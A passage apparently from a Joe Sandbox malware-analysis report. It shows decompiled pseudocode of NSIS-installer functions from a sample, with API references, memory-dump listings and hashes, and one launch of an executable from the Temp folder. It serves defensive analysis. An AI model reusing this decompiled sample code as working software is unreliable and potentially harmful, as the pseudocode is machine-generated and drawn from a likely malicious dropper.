                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: Text$ItemTimerWindowwsprintf
                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                    • API String ID: 1451636040-1158693248
                                    • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                    • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                    • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                    • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 93%
                                    			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                                    0x00402950
                                    0x00402952
                                    0x00402957
                                    0x0040295c
                                    0x0040295f
                                    0x00402969
                                    0x0040296d
                                    0x0040296d
                                    0x00402973
                                    0x00402980
                                    0x00402988
                                    0x0040298b
                                    0x00402997
                                    0x0040299a
                                    0x004029a0
                                    0x004029ae
                                    0x004029b3
                                    0x004029b7
                                    0x004029ba
                                    0x004029c3
                                    0x004029cf
                                    0x004029d3
                                    0x004029d6
                                    0x004029e0
                                    0x004029ff
                                    0x004029e7
                                    0x004029ec
                                    0x004029f4
                                    0x004029f7
                                    0x004029fc
                                    0x004029fc
                                    0x00402a06
                                    0x00402a06
                                    0x00402a13
                                    0x00402a19
                                    0x00402a1f
                                    0x00402a1f
                                    0x004029b7
                                    0x00402a33
                                    0x00402a35
                                    0x00402a35
                                    0x00402a3f
                                    0x00402a40
                                    0x00402a44
                                    0x00402a48
                                    0x00402a4e
                                    0x00402a4e
                                    0x00402a55
                                    0x004022f1
                                    0x00402c2d
                                    0x00402c39

                                    APIs
                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                    • GlobalFree.KERNEL32(?), ref: 00402A06
                                    • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                    • CloseHandle.KERNEL32(?), ref: 00402A35
                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                    • String ID:
                                    • API String ID: 2667972263-0
                                    • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                    • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                    • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                    • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                                    0x00404e7a
                                    0x00404e7f
                                    0x00404e87
                                    0x00404e88
                                    0x00404e95
                                    0x00404e9d
                                    0x00404e9e
                                    0x00404ea0
                                    0x00404ea2
                                    0x00404ea4
                                    0x00404ea7
                                    0x00404ea7
                                    0x00404eae
                                    0x00404eb4
                                    0x00404eb4
                                    0x00404ebb
                                    0x00404ec2
                                    0x00404ec5
                                    0x00404ec8
                                    0x00404ec8
                                    0x00404ecc
                                    0x00404edc
                                    0x00404ede
                                    0x00404ee1
                                    0x00404e8a
                                    0x00404e8a
                                    0x00404e91
                                    0x00404e91
                                    0x00404ee9
                                    0x00404ef4
                                    0x00404f0a
                                    0x00404f1b
                                    0x00404f37

                                    APIs
                                    • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                    • wsprintfW.USER32 ref: 00404F1B
                                    • SetDlgItemTextW.USER32 ref: 00404F2E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: ItemTextlstrlenwsprintf
                                    • String ID: %u.%u%s%s$H7B
                                    • API String ID: 3540041739-107966168
                                    • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                    • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                                    • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                                    • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 48%
                                    			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                                    0x00402eb4
                                    0x00402ebd
                                    0x00402ec6
                                    0x00402ed2
                                    0x00402edb
                                    0x00402ee5
                                    0x00402f0a
                                    0x00402f10
                                    0x00402f15
                                    0x00402f16
                                    0x00402f46
                                    0x00402f1f
                                    0x00402f21
                                    0x00402f71
                                    0x00402f74
                                    0x00000000
                                    0x00402f7a
                                    0x00402f30
                                    0x00402f35
                                    0x00402f37
                                    0x00000000
                                    0x00000000
                                    0x00402f3f
                                    0x00402f44
                                    0x00402f45
                                    0x00402f45
                                    0x00402f52
                                    0x00402f5a
                                    0x00402f61
                                    0x00000000
                                    0x00402f8a
                                    0x00000000
                                    0x00402f69
                                    0x00402ef5
                                    0x00402f08
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00402f08
                                    0x00402f90

                                    APIs
                                    • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00402EFD
                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                                    • RegCloseKey.ADVAPI32(?), ref: 00402F52
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                                    • RegCloseKey.ADVAPI32(?), ref: 00402F74
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: CloseEnum$DeleteValue
                                    • String ID:
                                    • API String ID: 1354259210-0
                                    • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                    • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                    • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                    • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                                    0x00401d81
                                    0x00401d85
                                    0x00401d9a
                                    0x00401d87
                                    0x00401d89
                                    0x00401d8f
                                    0x00401d8f
                                    0x00401da0
                                    0x00401da3
                                    0x00401dad
                                    0x00401db0
                                    0x00401db8
                                    0x00401dc9
                                    0x00401dcc
                                    0x00401dd7
                                    0x00401dce
                                    0x00401dd0
                                    0x00401dd0
                                    0x00401ddb
                                    0x00401de5
                                    0x00401e0c
                                    0x00401e1b
                                    0x00401e29
                                    0x00401e31
                                    0x00401e39
                                    0x00401e39
                                    0x00401e42
                                    0x00401e48
                                    0x00402ba4
                                    0x00402ba4
                                    0x00402c2d
                                    0x00402c39

                                    APIs
                                    • GetDlgItem.USER32(?,?), ref: 00401D9A
                                    • GetClientRect.USER32 ref: 00401DE5
                                    • LoadImageW.USER32 ref: 00401E15
                                    • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                    • DeleteObject.GDI32(00000000), ref: 00401E39
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                    • String ID:
                                    • API String ID: 1849352358-0
                                    • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                    • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                    • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                    • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 73%
                                    			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066A5(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065AF();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                    0x00401e4e
                                    0x00401e59
                                    0x00401e5b
                                    0x00401e68
                                    0x00401e7f
                                    0x00401e84
                                    0x00401e91
                                    0x00401e96
                                    0x00401e9a
                                    0x00401ea5
                                    0x00401eac
                                    0x00401ebe
                                    0x00401ec4
                                    0x00401ec9
                                    0x00401ed3
                                    0x00402638
                                    0x0040156d
                                    0x00402ba4
                                    0x00402c2d
                                    0x00402c39

                                    APIs
                                    • GetDC.USER32(?), ref: 00401E51
                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                    • MulDiv.KERNEL32 ref: 00401E73
                                    • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                      • Part of subcall function 004066A5: lstrcatW.KERNEL32 ref: 0040684A
                                      • Part of subcall function 004066A5: lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\lyebkz.exe" C:\Users\user\AppData\Local\Temp\ektmwwvwm.tx,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                    • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                    Memory Dump Source
                                    • Source File: 00000005.00000002.987514881.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000005.00000002.987509042.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987527452.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987535866.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000043E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.000000000044B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000005.00000002.987590533.0000000000455000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                    Similarity
                                    • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                    • String ID:
                                    • API String ID: 2584051700-0
                                    • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                    • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                    • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                                    • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 59%
                                    			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                    0x00401c43
                                    0x00401c45
                                    0x00401c4c
                                    0x00401c4f
                                    0x00401c52
                                    0x00401c5c
                                    0x00401c60
                                    0x00401c63
                                    0x00401c6c
                                    0x00401c6c
                                    0x00401c6f
                                    0x00401c73
                                    0x00401c7c
                                    0x00401c7c
                                    0x00401c7f
                                    0x00401c83
                                    0x00401c85
                                    0x00401cda
                                    0x00401cdc
                                    0x00401ce7
                                    0x00401cf1
                                    0x00401cf4
                                    0x00401cf4
                                    0x00401cfd
                                    0x00000000
                                    0x00401c87
                                    0x00401c8e
                                    0x00401c90
                                    0x00401c93
                                    0x00401c99
                                    0x00401ca0
                                    0x00401ca3
                                    0x00401ccb
                                    0x00401d03
                                    0x00401d03
                                    0x00401ca5
                                    0x00401cb3
                                    0x00401cbb
                                    0x00401cbe
                                    0x00401cbe
                                    0x00401ca3
                                    0x00401d06
                                    0x00401d09
                                    0x00401d0f
                                    0x00402ba4
                                    0x00402ba4
                                    0x00402c2d
                                    0x00402c39

                                    APIs
                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
